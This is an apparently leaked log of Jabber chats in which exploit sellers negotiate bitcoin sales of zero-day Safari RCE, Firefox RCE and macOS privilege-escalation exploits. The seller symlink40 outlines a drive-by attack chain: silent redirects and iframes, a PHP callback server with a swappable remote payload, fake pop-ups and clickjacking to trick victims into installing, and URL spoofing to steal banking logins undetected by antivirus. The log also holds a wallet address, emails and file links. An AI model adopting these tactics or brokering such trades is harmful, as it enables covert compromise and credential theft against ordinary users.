2164(20:27:06) Alexander Alexander : this is the only region that i am making delay in LPE deal
2165(20:27:10) kernel12345: I have question
2166(20:27:18) Alexander Alexander : as and when the first deal close i will buy LPE
2167(20:27:23) Alexander Alexander : money not a problem
2168(20:27:45) kernel12345: when you will be here you sure you paying the advanced payment so I can be sure to give you the source and don't have to worry ?
2169(20:27:52) kernel12345: after 20hours as you said ?
2170(20:28:05) Alexander Alexander : after 20 hower i will be online
2171(20:28:11) Alexander Alexander : but not to pay advance
2172(20:28:17) kernel12345: you will be online only ?
2173(20:28:18) Alexander Alexander : this deal will move in next week
2174(20:28:36) Alexander Alexander : yes bro
2175(20:28:37) kernel12345: I have to wait until the next 1 day of next week ?
2176(20:28:58) Alexander Alexander : till the end of next week we will buy your stuff
2177(20:29:03) Alexander Alexander : not it in your mind
2178(20:29:22) kernel12345: tell end of next week
2179(20:29:34) kernel12345: you know why im nervous ?
2180(20:30:09) kernel12345: im nervous to wait for you 2 3 4 weeks I don't care about time but I care about waiting that long for a trusted buyer like you and you come back with no payment then I lost buyers and lose you
2181(20:30:12) kernel12345: then im fucked up
2182(20:30:19) kernel12345: my 0day will not worth a shit then ..
2183(20:30:27) kernel12345: look to be homnest
2184(20:30:33) kernel12345: till end of next week is a lot for
2185(20:30:40) kernel12345: if you want me to wait for you 4 days is maximu
2186(20:30:42) kernel12345: maximum
2187(20:30:49) kernel12345: if not good luck finding another seller
2188(20:30:51) kernel12345: :)
2189(20:31:00) Alexander Alexander : i will buy from u
2190(20:31:05) Alexander Alexander : you look good
2191(20:31:25) kernel12345: I told you
2192(20:31:27) kernel12345: 4 days
2193(20:31:34) kernel12345: take your time in this 4 days
2194(20:31:42) kernel12345: after 4 days I will sell to someone else
2195(20:32:00) kernel12345: that's why I asked you for advance to book exploit for you and give you source then take time paying rest of paying
2196(20:32:05) Alexander Alexander : bro make it 6 days pls
2197(20:32:09) kernel12345: please understad what im saying
2198(20:32:18) kernel12345: 6 days with no advance is a lot for me
2199(20:32:22) kernel12345: sorry but NO !
2200(20:32:25) Alexander Alexander : pls bro
2201(20:32:39) kernel12345: 1k now and take src and make it 6 then pay whatever you want
2202(20:32:42) kernel12345: I can';t
2203(20:32:57) kernel12345: I need money in my pocket for real life stuff .. im not rich as you
2204(20:33:07) Alexander Alexander : hahahah
2205(20:33:11) Alexander Alexander : we will make you reach
2206(20:33:13) Alexander Alexander : no worry
2207(20:33:16) Alexander Alexander : listen
2208(20:33:24) Alexander Alexander : do u work on other 0 day as well
2209(20:33:25) Alexander Alexander : ?
2210(20:33:30) kernel12345: yes
2211(20:33:37) Alexander Alexander : which one bro
2212(20:33:45) kernel12345: I have RCE on safari
2213(20:33:50) kernel12345: to get LPE on OSX
2214(20:34:09) kernel12345: not finished yet
2215(20:34:27) Alexander Alexander : wait wait
2216(20:34:30) Alexander Alexander : what u say
2217(20:34:35) kernel12345: ?
2218(20:34:38) Alexander Alexander : you have RCE on mac safari
2219(20:34:39) Alexander Alexander : ?
2220(20:34:44) kernel12345: yes
2221(20:34:48) kernel12345: not finished yat
2222(20:34:50) kernel12345: yet*
2223(20:34:53) Alexander Alexander : oh
2224(20:35:11) kernel12345: I can only launch un-privlege apps
2225(20:35:22) kernel12345: browser crash sometimes
2226(20:35:23) Alexander Alexander : great
2227(20:35:28) kernel12345: needs more code review and fixes
2228(20:35:30) Alexander Alexander : i will buy that also
2229(20:35:30) Alexander Alexander : btw bro
2230(20:35:40) Alexander Alexander : do u also have something for iphone
2231(20:35:42) Alexander Alexander : android
2232(20:35:43) Alexander Alexander : ?
2233(20:35:43) kernel12345: when I finish I tell you
2234(20:35:47) kernel12345: no
2235(20:35:50) kernel12345: I don't do phones
2236(20:36:20) kernel12345: one friend from china used to have IOS stuff
2237(20:36:42) Alexander Alexander : great
2238(20:36:45) kernel12345: I will go now
2239(20:36:50) kernel12345: I have familly and wife waiting
2240(20:36:59) kernel12345: talk to you later
2241(20:37:01) Alexander Alexander : okay lissen
2242(20:37:03) Alexander Alexander : pls come online
2243(20:37:03) Alexander Alexander : tomorrow
2244(20:37:04) kernel12345: update me everyday with any news
2245(20:37:08) Alexander Alexander : after 22 hower
2246(20:37:10) kernel12345: ok . I will
2247(20:37:13) Alexander Alexander : same time like today
2248(20:37:20) kernel12345: ok I saved 20 hours from now will be online
2249(20:37:26) Alexander Alexander : do u have telegram bro
2250(20:37:30) kernel12345: yeah, no problem
2251(20:37:36) kernel12345: no only jabber/email/
2252(20:37:41) kernel12345: I will make up later
2253(20:37:41) Alexander Alexander : ok no problem
2254(20:37:44) kernel12345: send me yours so I can add
2255(20:37:47) Alexander Alexander : lets meet tomorrow
2256(20:37:53) kernel12345: is easy to chat when im outside on phone
2257(20:37:58) kernel12345: meet ?
2258(20:38:05) Alexander Alexander : meet mean
2259(20:38:08) Alexander Alexander : meet on jabber
2260(20:38:11) kernel12345: you mean talk not meet in real life
2261(20:38:15) kernel12345: haha ,
2262(20:38:16) kernel12345: good
2263(20:38:21) kernel12345: have a good day friend !
2264(20:38:32) Alexander Alexander : thanks friend
2265(20:38:34) Alexander Alexander : good luck
2266(2017-03-03 16:28:53) Alexander Alexander has signed on.
2267(16:29:01) The following message received from sc1roka@exploit.im was not encrypted: [hi bro]
2268(16:29:06) The following message received from sc1roka@exploit.im was not encrypted: [good evening]
2269(16:30:10) Attempting to refresh the private conversation with sc1roka@exploit.im/xtpdcman...
2270(16:30:12) Successfully refreshed the unverified (http://otr-help.cypherpunks.ca/unverified.php?lang=en) conversation with sc1roka@exploit.im/xtpdcman.
2271(16:30:23) kernel12345: hello friend !
2272(16:30:37) Alexander Alexander : as i told
2273(16:30:47) Alexander Alexander : how u doing today bro
2274(16:30:54) kernel12345: good evening
2275(16:31:01) kernel12345: didn't read your message evry well
2276(16:31:04) kernel12345: I just woke up!
2277(16:31:13) kernel12345: doing good . thanks for asking :)
2278(16:31:28) Alexander Alexander : its 11 pm here
2279(16:32:08) kernel12345: good
2280(16:32:16) kernel12345: you asked to meet on jabber last day
2281(16:32:44) Alexander Alexander : as i told that i will be coming after 22 hower so i came
2282(16:32:46) Alexander Alexander : and also
2283(16:33:04) Alexander Alexander : i have told you that we will buy then we will buy 100% sure
2284(16:33:12) Alexander Alexander : but will take some time
2285(16:33:47) Alexander Alexander : and also i will buy your all 0 day
2286(16:33:55) Alexander Alexander : coming in the feuter
2287(16:34:15) kernel12345: I hope so
2288(16:34:24) Alexander Alexander : thanks bro
2289(16:34:28) kernel12345: no problem!
2290(16:34:34) Alexander Alexander : next 2 days is weekend off
2291(16:34:40) kernel12345: ok
2292(16:34:42) kernel12345: I will be on time
2293(16:34:53) Alexander Alexander : no problem my friend
2294(17:27:34) Alexander Alexander has signed off.
2295(17:27:35) Alexander Alexander has signed on.
2296(17:39:47) Alexander Alexander : bro going to sleep now
2297(17:40:01) Alexander Alexander : will talk to you soon for closing the deal
2298(17:40:12) Alexander Alexander : may i go for sleep bro
2299(17:41:43) sc1roka@exploit.im/xtpdcman has ended his/her private conversation with you; you should do the same.
2300(17:41:44) Alexander Alexander has signed off.
2301(17:41:55) Private conversation with sc1roka@exploit.im lost.
2302
2303 mus3@xmpp.jp on Sun Feb 26 19:42:28 2017:
2304(19:42:31) Attempting to start a private conversation with mus3@xmpp.jp...
2305(19:42:34) mus3@xmpp.jp has not been authenticated yet. You should authenticate this buddy.
2306(19:42:34) Unverified conversation with mus3@xmpp.jp/170172820682242195351488137924510534 started.
2307(19:42:35) Attempting to refresh the private conversation with mus3@xmpp.jp/170172820682242195351488137924510534...
2308(19:42:38) Successfully refreshed the unverified conversation with mus3@xmpp.jp/170172820682242195351488137924510534.
2309(19:42:41) symlink40: who are you ?
2310(19:42:55) mus3@xmpp.jp: why ask that stupi qquestion?
2311(19:43:02) mus3@xmpp.jp: did yyou not avertise on abber spam?
2312(19:43:06) mus3@xmpp.jp: i am intereste in the exploit
2313(19:43:29) symlink40: yes I advertise and im asking why to know if new contacts added me for latest 0days I posted or something else
2314(19:43:40) mus3@xmpp.jp: yes, for the 0ays
2315(19:43:48) mus3@xmpp.jp: but now it is no longer an 0day
2316(19:43:55) mus3@xmpp.jp: you have avertised on spam
2317(19:43:58) symlink40: yes
2318(19:44:03) symlink40: there is no CVE
2319(19:44:06) symlink40: is fully private
2320(19:44:20) mus3@xmpp.jp: do you make these exploits yourself?
2321(19:44:28) symlink40: yes
2322(19:44:35) symlink40: me and my team member
2323(19:44:40) mus3@xmpp.jp: so tell me more
2324(19:44:48) symlink40: what are you intrested FF , TBB ?
2325(19:45:01) mus3@xmpp.jp: FF and flash
2326(19:45:16) symlink40: FF latest version RCE
2327(19:45:21) symlink40: flash old version
2328(19:45:28) symlink40: and I think I will pull up that flash 0day
2329(19:45:40) symlink40: people are not intrested in it a lot because of the version
2330(19:46:05) mus3@xmpp.jp: ok
2331(19:46:08) mus3@xmpp.jp: the FF
2332(19:46:13) symlink40: Yes
2333(19:46:38) symlink40: you want more details about it >
2334(19:46:39) symlink40: ?
2335(19:47:32) mus3@xmpp.jp: yes
2336(19:47:41) symlink40: ok
2337(19:47:48) symlink40: send me your email I will forward you
2338(19:55:34) symlink40: you there ?
2339(19:57:15) mus3@xmpp.jp: yes
2340(19:57:26) symlink40: send me your email or I should just copy paste details into pastebin ?
2341(19:57:30) symlink40: for you
2342(19:57:42) mus3@xmpp.jp: (7:51:42 PM) mus3@xmpp.jp/170172820682242195351488137924510534: danzach@comcast.net
2343(19:57:43) symlink40: anyway you wanna get the details in what format
2344(19:57:48) mus3@xmpp.jp: danzach@comcast.net
2345(19:57:52) symlink40: Ok 1 sec
2346(19:59:32) symlink40: done
2347(19:59:38) symlink40: check your inbox please,
2348(20:06:32) mus3@xmpp.jp: ok
2349(20:07:18) symlink40: so you main intrests in firefox exploit ?
2350(20:48:31) symlink40: you there ?
2351(21:05:49) mus3@xmpp.jp has signed on.
2352(21:10:34) mus3@xmpp.jp has signed on.
2353(23:32:32) mus3@xmpp.jp has signed on.
2354(23:34:58) symlink40: im dropping prices . let me know if you still intrested for booking
2355(23:46:51) mus3@xmpp.jp has signed on.
2356
2357
2358---
2359
2360
2361(00:19:18) You feel a disturbance in the force...
2362(00:19:18) The encrypted message received from mus3@xmpp.jp is unreadable, as you are not currently communicating privately.
2363(00:19:18) mus3@xmpp.jp has signed on.
2364(00:19:21) Unverified (http://otr-help.cypherpunks.ca/unverified.php?lang=en) conversation with mus3@xmpp.jp/6304986739874483011488495549911851 started.
2365(00:19:22) mus3@xmpp.jp: [resent] maybe you do not get my messages
2366(00:19:46) symlink40: hi
2367(00:20:03) symlink40: did you sent me something ? I was offline my friend . resend please
2368(00:20:05) symlink40: thank you
2369
2370
2371 anony0wor@xmpp.ru on Tue Feb 28 15:20:39 2017:
2372(15:57:02) symlink40: send me your email man
2373(15:57:10) symlink40: I got safari 0day video demo done
2374(15:57:17) symlink40: doing firefox/windows right now
2375(16:20:07) symlink40: here is safari video demo (rce 0day)
2376https://www.sendspace.com/file/sn5eca
2377password : symsym2018
2378(2017-02-28 20:01:03) anony0wor@xmpp.ru: Send me on cyberhunk@protonmail.com
2379(22:21:55) anony0wor@xmpp.ru has signed on.
2380(22:22:46) Attempting to start a private conversation with anony0wor@xmpp.ru/Monal-iOS...
2381(22:24:37) symlink40: you there ? I sent Safari demo video,
2382(22:25:45) symlink40: firefox is hard to exploit recoding my shellcodes
2383(22:28:21) symlink40: sent you via email
2384(22:31:55) anony0wor@xmpp.ru has signed on.
2385(22:41:52) anony0wor@xmpp.ru has signed on.
2386(23:01:06) anony0wor@xmpp.ru has signed on.
2387(00:52:11) anony0wor@xmpp.ru has signed on.
2388(00:56:23) symlink40: hello ?
2389(00:56:31) symlink40: any reply !!!
2390(01:41:48) anony0wor@xmpp.ru has signed on.
2391(23:38:41) anony0wor@xmpp.ru has signed on.
2392(23:49:31) symlink40: hello ?
2393(00:25:18) anony0wor@xmpp.ru has signed on.
2394(01:21:21) anony0wor@xmpp.ru has signed on.
2395
2396
2397---
2398
2399
2400(2017-03-02 09:49:21) anony0wor@xmpp.ru: Hi friend
2401(2017-03-02 09:49:25) anony0wor@xmpp.ru: Sorry for delay
2402(2017-03-02 09:49:34) anony0wor@xmpp.ru: Tell me the cost for safari RCE
2403(2017-03-02 09:50:23) anony0wor@xmpp.ru: And tell me what exactly is deliverable?
2404(11:34:19) anony0wor@xmpp.ru has signed on.
2405(11:35:01) symlink40: the price is 7000$
2406(11:35:19) symlink40: bitcoin payment is okay for you ?
2407(11:35:48) symlink40: once you make payment I submit full exploit source code to you on zip archive with password on any site you want ?
2408(11:35:54) anony0wor@xmpp.ru: Yes BTC is ok for me
2409(11:36:15) anony0wor@xmpp.ru: And you'll help us to setup also?
2410(11:36:18) symlink40: you are okay with the price also my friend ?
2411(11:36:20) symlink40: yes
2412(11:36:24) symlink40: what do you want ?
2413(11:36:35) anony0wor@xmpp.ru: I need to discuss for price with my partner
2414(11:36:37) symlink40: landing the exploit on a site or inframes from a hack site ?
2415(11:36:47) anony0wor@xmpp.ru: I'll come back to you for price shortly
2416(11:36:56) symlink40: ok
2417(11:37:01) anony0wor@xmpp.ru: Landing exploit from my own website
2418(11:37:19) symlink40: okay
2419(11:37:25) symlink40: that will add some thing to the price
2420(11:37:29) symlink40: but I can do it for free
2421(11:37:35) symlink40: if you are a trusted client for me
2422(11:37:49) symlink40: you have server+host ?
2423(11:38:21) anony0wor@xmpp.ru: Friend I only worked with professionals and with working products
2424(11:38:26) anony0wor@xmpp.ru: You can trust on me
2425(11:38:42) anony0wor@xmpp.ru: I'll buy everything required like server host etc
2426(11:39:02) anony0wor@xmpp.ru: Is it compulsary for someone to click on button to excute attack?
2427(11:39:32) symlink40: they don't have to click the button shown in the video demo is ent
2428(11:39:33) symlink40: sent
2429(11:39:59) symlink40: server side code will launch any apps you want directly by redirecting the browser to the exploit
2430(11:40:08) symlink40: wihtout the user notice
2431(11:40:20) symlink40: redirecting iframes also is good
2432(11:41:44) anony0wor@xmpp.ru: I want something like this: I am sending link to my target and when someone click on the link, my payload executed
2433(11:42:19) anony0wor@xmpp.ru: Can I execute my own payload from remote server as well?
2434(11:43:35) symlink40: yes
2435(11:43:51) symlink40: we can add external payload manager for changing payloads from the exploit everytime
2436(11:44:35) anony0wor@xmpp.ru: Okay. Thanks.
2437(11:45:00) anony0wor@xmpp.ru: So you can prepare everything for me?
2438(11:45:01) symlink40: we will add 1 step first for redirect so the site will seem legit then a redirect will open a tab .. I can code an empty page with the payload inside once the exploit drop inside the file context we don't have to worry about the target closing his browser or closing tabs so we can run/execute anything from there
2439(11:45:10) symlink40: after you purchase
2440(11:45:12) symlink40: I can do
2441(11:45:13) symlink40: is easy
2442(11:45:15) anony0wor@xmpp.ru: Sure
2443(11:45:40) symlink40: how much time will take you until you decide with your partner
2444(11:46:09) anony0wor@xmpp.ru: Okay. I'm contacting my partner to discuss and I'll message you
2445(11:46:25) symlink40: ok
2446(11:46:36) symlink40: I will be waiting for you reply!
2447(11:48:01) anony0wor@xmpp.ru: Ok so he is ok with this but we should be able to change the payload from our end whenever we want
2448(11:48:41) anony0wor@xmpp.ru: Explain the requirements for this. I mean which server etc will be needed to complete payload attack
2449(11:49:43) symlink40: Yes you can change the payload from the server itself
2450(11:49:50) symlink40: the server side code will do all the work
2451(11:50:07) symlink40: you want requirement for the server and what you need for the setup ?
2452(11:50:09) anony0wor@xmpp.ru: Okay but we have to buy server right?
2453(11:50:25) symlink40: look
2454(11:50:34) anony0wor@xmpp.ru: Ok yes a centos with cpanel will do i think
2455(11:50:34) symlink40: let me ask you and answer so you can have a better understand
2456(11:50:39) symlink40: what's your target ?
2457(11:50:40) anony0wor@xmpp.ru: Yes sure
2458(11:51:20) anony0wor@xmpp.ru: Target can be anyone using safari. I want to execute a mac application when link is opened on safari
2459(11:51:37) anony0wor@xmpp.ru: I want my app to run when link is opened
2460(11:52:00) symlink40: first you need a server . and I prefer Ubuntu server with only a dashboard for uploading php script .. we gonna setup a some php files for the payload callbacks .. so when the payloads checks the target a function will call back the script checking that it was exploit and you can modify from there the payload ..
2461(11:52:15) symlink40: without an app I can make a fake app alert or POP UP
2462(11:52:40) symlink40: blocks browser tabs when target click close . the close tab button has the dropper script inside wich drops the payload
2463(11:52:59) symlink40: clickjacking stuff is easy .. no javascript . we gonna do straight HTML
2464(11:53:06) anony0wor@xmpp.ru: Yes ok. So after you deliver full package, i just need to replace your fake app with mine. Right?
2465(11:53:32) anony0wor@xmpp.ru: Like in the vid you opened calc
2466(11:53:53) symlink40: you don't need to replace anythign . just replace payload
2467(11:53:54) symlink40: yes
2468(11:54:05) anony0wor@xmpp.ru: Was it downloaded to target system or was just run from the system itself?
2469(11:54:15) symlink40: video demo opened calc and you can modify to open anything
2470(11:54:32) symlink40: it was downloaded into the file context of safari then executed using system priv
2471(11:54:38) anony0wor@xmpp.ru: Yes so i want to understand, you placed calc app on server ok?
2472(11:54:46) symlink40: no
2473(11:54:57) symlink40: you only change a part of code to run apps you want
2474(11:54:59) symlink40: look
2475(11:55:01) symlink40: I got idea
2476(11:55:12) symlink40: if you targeting people to steal banking/login forms ?
2477(11:55:37) anony0wor@xmpp.ru: No not exactly the purpose. But kind of
2478(11:56:04) symlink40: an easy redirect and URL spoofing will get you the stuff / because a fake URL page will show up inside the URLbar without exposing the fake URL because is being executed from the file context of safari and no AV/Google/ security vendor will detect that
2479(11:56:08) symlink40: just giving you ideas
2480(11:56:25) symlink40: let me know when you finish with your parnet so we can start
2481(11:56:27) symlink40: ok man ?
2482(11:56:34) anony0wor@xmpp.ru: See i want to understand, if i have xyz.app which is my app, how can i use your exploit to run it on target system?
2483(11:57:27) symlink40: we can place it in the download payload and make a fake POP up alert to the target when he click ok the executed functions is fake .. he will think he clicked ok but clicked install
2484(11:57:33) symlink40: that will take me sometime to code
2485(11:57:40) symlink40: coz of OSX security rules
2486(11:57:45) symlink40: of is that ok with you ?
2487(11:58:12) anony0wor@xmpp.ru: Yes if it would work like you say it then great
2488(11:58:20) anony0wor@xmpp.ru: My partner is ready for this
2489(11:58:32) symlink40: you ready ?
2490(11:58:38) symlink40: he accept btc payment ?
2491(11:58:53) anony0wor@xmpp.ru: But im thinking may be it could be little less price
2492(11:59:01) anony0wor@xmpp.ru: Yes we are ready for btc
2493(11:59:11) symlink40: what's your price ?
2494(11:59:19) anony0wor@xmpp.ru: 6k
2495(11:59:51) symlink40: can we setup long term relationship ? so can we work on future deals ?
2496(12:00:02) anony0wor@xmpp.ru: If its successfully executing my.app on targrt system. And if possible, without 2nd click. Just open the link and boom
2497(12:00:19) symlink40: if that okay with to work collaboration on future deals
2498(12:00:23) anony0wor@xmpp.ru: Yes right. If this goes well. We can team up for long term deals
2499(12:00:25) symlink40: ok . im okay with 6k
2500(12:00:47) symlink40: yes that's what I want .. teaming up long term deals
2501(12:00:57) anony0wor@xmpp.ru: Same here man.
2502(12:01:05) symlink40: so you ready todo this ?
2503(12:01:17) anony0wor@xmpp.ru: So ok, yes i'm ready
2504(12:01:28) symlink40: should I send my btc address ?
2505(12:01:32) anony0wor@xmpp.ru: But you need to still show how you would execute app
2506(12:01:37) anony0wor@xmpp.ru: My.app
2507(12:01:41) symlink40: ys
2508(12:01:42) symlink40: yes
2509(12:01:50) symlink40: can you send your app download link ?
2510(12:01:56) anony0wor@xmpp.ru: Okay so i'm in
2511(12:02:08) symlink40: I will modify the source from here
2512(12:02:15) symlink40: then write up how to modify it
2513(12:02:22) symlink40: after purchase I setup the callback script for you
2514(12:02:24) anony0wor@xmpp.ru: I dont have it uploaded anywhere
2515(12:02:28) symlink40: you just need to get host+server
2516(12:02:36) symlink40: can you upload to sendspace.com ?
2517(12:02:41) anony0wor@xmpp.ru: Lets take some genuine app from internet and use it for demo
2518(12:02:49) symlink40: ok
2519(12:02:58) anony0wor@xmpp.ru: It can be done right?
2520(12:03:02) symlink40: yes
2521(12:03:16) symlink40: you ready for payment ?
2522(12:03:50) anony0wor@xmpp.ru: Yes im ready for payment but first you need to show another video with required capability
2523(12:04:03) symlink40: you want me to another video with what ?
2524(12:04:24) anony0wor@xmpp.ru: As i said, you need to show that you can run any app using the exploit you have
2525(12:04:32) anony0wor@xmpp.ru: Not just calc
2526(12:04:33) symlink40: do you want me to do all things we talked about on another video without payment first ?
2527(12:04:40) symlink40: no
2528(12:04:46) symlink40: wasting my time for nothing
2529(12:04:51) anony0wor@xmpp.ru: I can make partial payment before yo deliver. Is that ok?
2530(12:05:00) symlink40: what partial payment ?
2531(12:05:18) anony0wor@xmpp.ru: 1k is ok?
2532(12:05:21) symlink40: we agree on the 6k payment and I give you a good discount . as I told you after purchsing I can setup the payloads for you
2533(12:05:29) symlink40: 1k as an advanced payment ?
2534(12:07:16) anony0wor@xmpp.ru: Yes 1k as advance payment for the video to demonstrate
2535(12:07:37) symlink40: make it 1500$ so I can know you fully intrested buyer
2536(12:07:49) symlink40: so I can know im wasting time for nothing and for a serouis buyer ?
2537(12:10:04) anony0wor@xmpp.ru: Ok im ok with 1500. Then you will send another video right? Let me check with him if he has btc right now or if it will take time. I dont want to make fake promise to yoi
2538(12:10:08) anony0wor@xmpp.ru: *you
2539(12:10:25) symlink40: yes
2540(12:10:32) symlink40: ok
2541(12:10:39) symlink40: check with him and reply me
2542(12:10:47) symlink40: and send link to the app you wanna demo on
2543(12:12:16) anony0wor@xmpp.ru: Ok
2544(12:12:18) anony0wor@xmpp.ru: Wait
2545(12:12:24) anony0wor@xmpp.ru: 10 min
2546(12:12:30) symlink40: 10 min for what ?
2547(12:12:33) anony0wor@xmpp.ru: I give you final answer
2548(12:12:40) symlink40: ok man
2549(12:14:40) anony0wor@xmpp.ru: Ok we have 1500usd ready in btc
2550(12:14:45) symlink40: ok
2551(12:14:52) symlink40: should I send my btc address ?
2552(12:14:59) symlink40: send also link to download the app
2553(12:15:01) symlink40: please
2554(12:15:06) anony0wor@xmpp.ru: But we are prepping the app and upload it in order to give you link
2555(12:15:13) symlink40: ok
2556(12:15:15) symlink40: that's good
2557(12:15:38) symlink40: got btc ready ?
2558(12:15:41) anony0wor@xmpp.ru: Yes send your btc address
2559(12:15:44) symlink40: ok
2560(12:15:46) symlink40: 1 sec please
2561(12:15:58) symlink40: here is
2562(12:15:58) symlink40: 17kPq9Wf7Z34vC6Z8oL1nmxDaWmS4Mi153
2563(12:20:54) anony0wor@xmpp.ru: Wait
2564(12:20:59) symlink40: ok
2565(12:21:18) anony0wor@xmpp.ru: Dropbox link is ok?
2566(12:21:24) anony0wor@xmpp.ru: Or?
2567(12:21:24) symlink40: yeah
2568(12:21:27) symlink40: no problem
2569(12:21:28) anony0wor@xmpp.ru: Ok
2570(12:22:21) anony0wor@xmpp.ru: Doing both within 10 min
2571(12:22:26) anony0wor@xmpp.ru: Transfer and link
2572(12:22:32) symlink40: ok
2573(12:22:35) symlink40: sounds good
2574(12:33:18) anony0wor@xmpp.ru: Also how can we be sure that you are not selling the same exploit to others? And even more importantly to Apple?
2575(12:33:27) symlink40: no
2576(12:33:31) symlink40: I sell to 1 buyer
2577(12:33:32) symlink40: only
2578(12:33:44) symlink40: to protect quality of exploit . im not a re-seller
2579(12:34:07) symlink40: after this deal you will get to know me very well :)
2580(12:36:35) anony0wor@xmpp.ru: Yes thats what im hoping
2581(12:36:44) symlink40: trust me
2582(12:36:51) symlink40: you got app download link ready ?
2583(12:37:04) anony0wor@xmpp.ru: Great. So im uploading the app. Its myapp.zip
2584(12:37:08) symlink40: ok
2585(12:37:12) symlink40: let me know when is done
2586(12:37:12) anony0wor@xmpp.ru: Inside it, it is myapp.app
2587(12:37:16) symlink40: ok
2588(12:37:42) anony0wor@xmpp.ru: So i think when its pointed to zip, mac will automatically execute the .app inside. Right?
2589(12:37:59) symlink40: no
2590(12:38:04) symlink40: is unzip first
2591(12:38:18) anony0wor@xmpp.ru: Ok so you will unzip and set up as you want
2592(12:38:24) symlink40: is open a new folder where the zip was uncompressed
2593(12:38:27) symlink40: yes
2594(12:40:34) anony0wor@xmpp.ru: Link is http://bit.ly/2lh0Gol
2595(12:41:13) symlink40: sortDownloads ?
2596(12:41:14) symlink40: got it
2597(12:41:17) anony0wor@xmpp.ru: Yes
2598(12:41:25) anony0wor@xmpp.ru: Just to test
2599(12:41:44) symlink40: yeah no problem
2600(12:41:49) symlink40: transfer is also done ?
2601(12:42:46) anony0wor@xmpp.ru: Doing it
2602(12:42:52) symlink40: ok
2603(12:43:04) anony0wor@xmpp.ru: Can you please resend the BTc address
2604(12:43:09) symlink40: ok
2605(12:43:11) symlink40: 1 sec
2606(12:43:21) symlink40: 17kPq9Wf7Z34vC6Z8oL1nmxDaWmS4Mi153
2607(12:44:32) anony0wor@xmpp.ru: 1500 transfer done
2608(12:44:47) symlink40: ok
2609(12:44:50) symlink40: let me check my wallet
2610(12:45:01) anony0wor@xmpp.ru: Yes
2611(12:46:53) symlink40: done ??
2612(12:47:11) anony0wor@xmpp.ru: Yes transfered
2613(12:49:19) symlink40: still nothing show up
2614(12:49:30) symlink40: can you send transaction tracker link ?
2615(12:49:32) symlink40: please
2616(12:49:37) anony0wor@xmpp.ru: Yes
2617(12:49:51) anony0wor@xmpp.ru: Using blockchain? Or what
2618(12:49:56) symlink40: yes
2619(12:52:34) anony0wor@xmpp.ru: Pls check now
2620(12:52:41) symlink40: ok
2621(12:52:41) symlink40: wait
2622(12:52:49) symlink40: I was checking source code
2623(12:54:46) anony0wor@xmpp.ru: Http://bit.ly/2lZLvNs
2624(12:54:53) anony0wor@xmpp.ru: Tracking link
2625(12:54:56) anony0wor@xmpp.ru: For payment
2626(12:55:29) symlink40: ok let me check
2627(12:55:36) anony0wor@xmpp.ru: Ok
2628(12:55:41) symlink40: this blockchain takes 3 confirmations
2629(12:56:08) anony0wor@xmpp.ru: Yes but payment is done. You still use the money because its under blockchain to blockchain
2630(12:56:42) symlink40: under what
2631(12:56:45) symlink40: let me
2632(12:57:41) anony0wor@xmpp.ru: Okay it'll be confirmed in another 30 minutes. Lets prepare the stuff
2633(12:57:53) symlink40: ok
2634(12:57:57) symlink40: im checking the source
2635(12:58:10) symlink40: can I test when finished on my localhost ?
2636(12:58:39) anony0wor@xmpp.ru: Yes you can test on localhost
2637(12:58:46) anony0wor@xmpp.ru: Its not a malware
2638(12:58:55) symlink40: it has interface
2639(12:58:59) symlink40: the app you sent ?
2640(12:59:24) anony0wor@xmpp.ru: Yes its GUI
2641(13:00:34) anony0wor@xmpp.ru: But its askig install prompt. Pop up for ok and cancel
2642(13:00:40) anony0wor@xmpp.ru: Thats it
2643(13:00:46) anony0wor@xmpp.ru: It means its executed
2644(13:01:02) symlink40: no
2645(13:01:06) symlink40: im asking you
2646(13:01:11) symlink40: the app
2647(13:01:16) symlink40: you sent me has any interface
2648(13:01:36) symlink40: so when I add the installation to the payload and click run it will pop up with interface
2649(13:01:37) symlink40: ?
2650(13:02:00) anony0wor@xmpp.ru: Yes when you execute that app. It will show a pop up for install. Giving two options 'ok' and 'cancel'
2651(13:02:13) anony0wor@xmpp.ru: Yes right
2652(13:02:56) symlink40: ok
2653(13:03:02) symlink40: what do you want me to pop on the payload
2654(13:03:09) symlink40: install interface or the app pre-installed ?
2655(13:04:08) symlink40: I can modify source when redirecting from the lading page to already install inside the file context of safari whitout user interaction then pop up the app when clicking ok . in your case we will replace run button with any choice of yours ok friend ?
2656(13:05:13) anony0wor@xmpp.ru: Yes it has to be without any user interaction it should show ok and cancel pop up
2657(13:05:46) anony0wor@xmpp.ru: Which will mean that the app i gave you is executed
2658(13:07:35) symlink40: installation will be done while redirecting from empty page to the fake button . so when we click the button function it will launch the app
2659
2660like we installed chrome via the payload while redirecting and will open it using the button
2661(13:07:37) symlink40: looks good ?
2662(13:07:44) symlink40: bro the app you sent me is empty
2663(13:08:00) symlink40: http://prntscr.com/ef39gg
2664(13:08:02) symlink40: 2kb ??
2665(13:08:09) symlink40: what is that
2666(13:08:24) anony0wor@xmpp.ru: Its not 2kb, its around 10kb
2667(13:08:32) anony0wor@xmpp.ru: Zip may be less
2668(13:09:31) anony0wor@xmpp.ru: Yes like in your previous demo, when calc is executed, the ok cancel pop up should show. But without the need of clicking on 'run' button on page
2669(13:10:22) anony0wor@xmpp.ru: Yes the screenshot you sent is correct
2670(13:10:29) anony0wor@xmpp.ru: Its size is 2kb
2671(13:11:14) anony0wor@xmpp.ru: Its just some app i found on github just using it to test your exploit
2672(13:11:33) anony0wor@xmpp.ru: Its some sort utility for mac having some shell script only. Nothing else
2673(13:11:40) symlink40: I unzip and moved it out of the folder and shows 2kb
2674(13:11:53) anony0wor@xmpp.ru: Yes its small
2675(13:12:36) symlink40: ok you wanna show ok/cancel when opening page only ? without the button?
2676(13:12:41) anony0wor@xmpp.ru: You can continue with his
2677(13:12:44) anony0wor@xmpp.ru: *this
2678(13:12:53) symlink40: the exeuction of script details like in demo show up on page
2679(13:13:00) anony0wor@xmpp.ru: Yes better if its run without button
2680(13:13:02) symlink40: do I need to hide them or leave them for you to see ?
2681(13:13:11) anony0wor@xmpp.ru: Yes you can leave them for me to see
2682(13:13:13) symlink40: yes I will be run without button
2683(13:13:15) symlink40: ok
2684(13:13:23) symlink40: that's a good choice so you can see how is done
2685(13:13:27) anony0wor@xmpp.ru: Yup
2686(13:13:27) symlink40: what functions being executed
2687(13:13:33) symlink40: gotta finish it right now
2688(13:13:41) symlink40: you will be here for next hour right ?
2689(13:13:48) anony0wor@xmpp.ru: Ok
2690(13:13:56) anony0wor@xmpp.ru: Yes
2691(13:14:13) anony0wor@xmpp.ru: But lets finish as soon as possible
2692(13:14:22) symlink40: yes
2693(13:14:39) symlink40: I will be offline working on it so people to disturb on jabber but I keep this chat open ok friend ?
